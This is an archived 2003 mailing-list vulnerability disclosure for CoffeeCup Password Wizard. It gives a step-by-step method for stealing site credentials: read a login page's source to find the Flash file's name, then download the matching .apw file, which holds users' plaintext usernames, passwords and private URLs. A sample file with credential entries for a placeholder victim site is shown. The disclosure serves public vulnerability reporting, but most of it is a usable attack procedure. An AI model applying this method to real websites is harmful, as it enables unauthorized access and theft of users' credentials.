+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions + Product: CoffeeCup Password Wizard All Versions + Vendor: CoffeeCup Software, Inc. + Site: http://www.coffeecup.com/java-password/ + About CoffeeCup Password Wizard: Create unlimited password protected pages with unlimited usernames and passwords with CoffeeCup Password Wizard. You don't even have to know Flash, Java, or HTML ! Customize the look and feel to match your page. You can even point different users to different URLs ! Preview within the program or your favorite browser. It's all that easy ! All this and more make CoffeeCup Password Wizard the easiest way to password protect your pages ! (¿?) + Description: Easy obtaining of names of users, passwords and a URL of direct access to the preferences of the same one. + Exploit: go to the login panel, see sourcecode HTML in search of the location of the file .swf used to make login. Example: Go to https://www.victim.com/billing/ See sourcecode, [...] ID=billing WIDTH=146 HEIGHT=125> <PARAM NAME=movie VALUE="billing.swf"> <PARAM NAME=quality VALUE=high> [...] (https://www.victim.com/billing/billing.swf) the file of the passwords is called just as the file of login, but with the extension .apw now, go to & download the file: https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password Wizard File) by I complete it opens east file with any text editor and found all the users with its passwords and the URL of direct access to its options. Example of passwords file: --------- billing.apw ----------- COFFEECUP PASSWORD WIZARD FILE WWW.COFFEECUP.COM PLEASE DO NOT EDIT!!!! MOVIE WIDTH:120 MOVIE HEIGHT:100 MOVIE FRAME RATE:0 MOVIE BK COLOR:$00ECECEC MOVIE DEFAULT URL: MOVIE DEFAULT FRAME: MOVIE SWF NAME:billing.swf MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billing\ MOVIE FONT NAME:MS Sans Serif MOVIE FONT SIZE:8 MOVIE FONT COLOR:clBlack MOVIE TRANSPARENT TRUE MOVIE VERTICAL TRUE USER BOX LEFT:2 USER BOX TOP:1 USER BOX WIDTH:116 USER BOX HEIGHT:34 USER BOX CAPTION:Username PASS BOX LEFT:2 PASS BOX TOP:36 PASS BOX WIDTH:116 PASS BOX HEIGHT:34 PASS BOX CAPTION:Password BUTTON LEFT:15 BUTTON TOP:78 BUTTON WIDTH:90 BUTTON HEIGHT:20 BUTTON PATH: BUTTON TX:1 BUTTON TY:1 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm [...] END --------- billing.apw ----------- Example of user & pass on billing: user: anyweb pass: xnet0305 url option panel: https://www.victim.com/billing/anyweb0001.htm ---------------------------------------------------------------- [EOF] ----------------------------------------------- Credits: ToOcOoL (http://www.valenciahack.com/) ----------------------------------------------- -------------------------------- Note: sorry by my bad english ;) -------------------------------- -- XyBØrG WebMaster de: www.RZWEB.com.ar Powered By Dattatec.Com +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
This archive was generated by hypermail 2b30 : Sun Mar 02 2003 - 13:50:18 PST